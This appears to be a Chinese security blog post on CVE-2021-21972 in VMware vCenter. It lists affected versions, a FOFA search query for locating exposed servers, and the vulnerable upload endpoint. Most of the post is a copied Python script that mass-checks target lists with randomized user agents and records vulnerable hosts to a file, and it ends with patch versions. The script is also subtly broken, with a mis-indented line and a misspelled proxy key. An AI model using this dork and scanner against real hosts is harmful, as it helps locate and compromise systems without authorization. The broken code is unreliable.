关于Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题

背景

CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞。该漏洞可以上传一个webshell至vcenter服务器的任意位置，然后执行webshell即可。

影响版本

vmware:esxi:7.0/6.7/6.5
vmware:vcenter_server:7.0/6.7/6.5

漏洞复现 fofa查询

语法:title="+ ID_VC_Welcome +"

POC

https://x.x.x.x/ui/vropspluginui/rest/services/uploadova

使用https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC脚本批量验证

#-*- coding:utf-8 -*-
banner = """
   888888ba       dP          
   88  `8b      88          
   a88aaaa8P' .d8888b. d8888P .d8888b. dP  dP
   88  `8b. 88' `88  88  Y8ooooo. 88  88
   88  .88 88. .88  88     88 88. .88
   88888888P `88888P8  dP  `88888P' `88888P'
 ooooooooooooooooooooooooooooooooooooooooooooooooooooo
       @time:2021/02/24 CVE-2021-21972.py
       C0de by NebulabdSec - @batsu        
"""
print(banner)

import threadpool
import random
import requests
import argparse
import http.client
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"

def get_ua():
 first_num = random.randint(55, 62)
 third_num = random.randint(0, 3200)
 fourth_num = random.randint(0, 140)
 os_type = [
   '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
   '(Macintosh; Intel Mac OS X 10_12_6)'
 ]
 chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
         '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
        )
 return ua

def CVE_2021_21972(url):
 proxies = {"scoks5": "http://127.0.0.1:1081"}
 headers = {
   'User-Agent': get_ua(),
   "Content-Type": "application/x-www-form-urlencoded"
 }
 targetUrl = url + TARGET_URI
 try:
   res = requests.get(targetUrl,
             headers=headers,
             timeout=15,
             verify=False,
             proxies=proxies)
             # proxies={'socks5': 'http://127.0.0.1:1081'})
   # print(len(res.text))
   if res.status_code == 405:
     print("[+] URL:{}--------存在CVE-2021-21972漏洞".format(url))
     # print("[+] Command success result: " + res.text + "\n")
     with open("存在漏洞地址.txt", 'a') as fw:
       fw.write(url + '\n')
   else:
     print("[-] " + url + " 没有发现CVE-2021-21972漏洞.\n")
 # except Exception as e:
 #   print(e)
 except:
   print("[-] " + url + " Request ERROR.\n")
def multithreading(filename, pools=5):
 works = []
 with open(filename, "r") as f:
   for i in f:
     func_params = [i.rstrip("\n")]
     # func_params = [i] + [cmd]
     works.append((func_params, None))
 pool = threadpool.ThreadPool(pools)
 reqs = threadpool.makeRequests(CVE_2021_21972, works)
 [pool.putRequest(req) for req in reqs]
 pool.wait()

def main():
 parser = argparse.ArgumentParser()
 parser.add_argument("-u",
           "--url",
           help="Target URL; Example:http://ip:port")
 parser.add_argument("-f",
           "--file",
           help="Url File; Example:url.txt")
 # parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
 args = parser.parse_args()
 url = args.url
 # cmd = args.cmd
 file_path = args.file
 if url != None and file_path ==None:
   CVE_2021_21972(url)
 elif url == None and file_path != None:
   multithreading(file_path, 10) # 默认15线程

if __name__ == "__main__":
 main()

EXP 修复建议

vCenter Server7.0版本升级到7.0.U1c
vCenter Server6.7版本升级到6.7.U3l
vCenter Server6.5版本升级到6.5 U3n

来源：https://blog.csdn.net/weixin_44146996/article/details/114099275